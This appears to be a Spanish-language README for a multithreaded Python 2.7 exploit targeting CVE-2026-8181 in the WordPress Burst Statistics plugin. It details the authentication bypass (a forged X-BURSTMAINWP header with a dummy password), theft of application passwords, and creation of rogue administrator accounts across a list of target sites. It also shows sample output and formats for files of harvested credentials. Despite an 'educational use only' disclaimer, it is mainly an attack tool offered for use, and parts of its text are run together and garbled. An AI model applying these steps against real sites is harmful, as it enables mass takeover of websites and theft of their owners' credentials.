
CVE-2026-8181: Bypass de autenticación de Burst Statistics → Toma de control de la API REST y creación de admin. Python 2.7. Solo para uso educativo.
Python 2.7 exploit para la vulnerabilidad del plugin Burst Statistics (CVE-2026-8181) que permite a atacantes no autenticados evadir la autenticación de la API REST, recuperar contraseñas de aplicación y crear nuevos usuarios administradores en sitios WordPress vulnerables.
⚠️ Aviso
Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Úsela únicamente en sitios que posea o para los que tenga permiso explícito de prueba. Puede ver el aviso de exención de responsabilidad en la portada de Jenderal92. Puede consultarlo AQUÍ !!!
CVE-2026-8181 afecta al plugin Burst Statistics para WordPress (versiones anteriores al parche). La falla reside en el mecanismo de autenticación de la API REST, permitiendo a un atacante:
X-BURSTMAINWP manipulado/burst/v1/mainwp-auth/, /wordpress, /wp)/wp-json/wp/v2/users o redirecciones por ID de autorres_login.txt – Credenciales de API REST concisas, separadas por tubería (fáciles de analizar/importar)full_res_login.txt – Informe completo legible por humanos que incluye verificación de acceso y contraseñas de aplicaciónrequestspip install requests
Prepare un archivo de lista de objetivos (un dominio o IP por línea, con o sin http:///https://).
Ejemplo targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
Ejecute el exploit:
python2 CVE-2026-8181.py targets.txt
res_login.txt – Credenciales de API REST (una línea por objetivo vulnerable)full_res_login.txt – Informe detallado| Argumento | Descripción |
|---|---|
list.txt | Ruta al archivo que contiene las URLs objetivo |
============================================================
CVE-2026-8181 - Exploit de Bypass de Autenticación en Burst Statistics
============================================================
[*] Total de objetivos: 2
[*] Hilos: 10
[*] Rutas base: ['', '/wordpress', '/wp']
[*] Escaneando: example.com
Probando ruta: /
Nombre de usuario detectado: admin
[+] ¡VULNERABLE! Bypass de API REST exitoso
[+] ¡Contraseña de aplicación obtenida!
[+] Usuario: admin
[+] Contraseña de aplicación: xxxx xxxx xxxx
[+] Token Base64: YWRtaW46eHh4eA==
[+] Acceso confirmado: configuraciones de WordPress
[+] Acceso confirmado: plugins instalados
[+] Acceso confirmado: usuarios administradores
[+] Usuario administrador creado mediante API REST: wp_abc123
[+] Resultados guardados en res_login.txt y full_res_login.txt
res_login.txt – Credenciales de API REST concisasCada línea sigue el siguiente formato separado por tubería:
target|username|password|email|user_id
Ejemplo:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
Este formato es ideal para:
cut, grep o Excelfull_res_login.txt – Informe detallado completoPara cada objetivo vulnerable, el script añade un bloque legible por humanos:
============================================================
Objetivo: http://example.com
============================================================
[+] Verificación de acceso:
[+] Configuraciones de WordPress
[+] Plugins instalados
[+] Usuarios administradores
[+] Credenciales de API REST:
Usuario: wp_abc123
Contraseña: random12char
Correo electrónico: [email protected]
ID de usuario: 42
URL: http://example.com/wp-admin/
Nota: Usar con el encabezado X-BURSTMAINWP
[+] Contraseña de aplicación:
Usuario: admin
Contraseña de aplicación: xxxx xxxx xxxx
Token Base64: YWRtaW46eHh4eA==
Nota: Si el endpoint de contraseña de aplicación no está disponible o no devuelve ningún token, esa sección mostrará
FALLÓ.
http:// si falta, elimina barras diagonales finales./, /wordpress y /wp como directorios base de WordPress./wp-json/wp/v2/users o usa redirecciones ?author=N.X-BURSTMAINWP: 1 + autenticación básica con nombre de usuario y contraseña ficticia (CVE-2026-8181). Si el endpoint /wp-json/wp/v2/users/me?context=edit devuelve 200, el sitio es vulnerable./wp-json/burst/v1/mainwp-auth para recuperar un token de contraseña de aplicación./settings, /plugins, .Puede modificar estas variables dentro del script:
THREADS – Número de hilos concurrentes (10 por defecto)BASE_PATHS – Subdirectorios adicionales de WordPress a verificarrequestsEste proyecto se proporciona únicamente con fines educativos. Úselo bajo su propio riesgo.
/usersPOST /wp-json/wp/v2/users.res_login.txt y detalles completos en full_res_login.txt.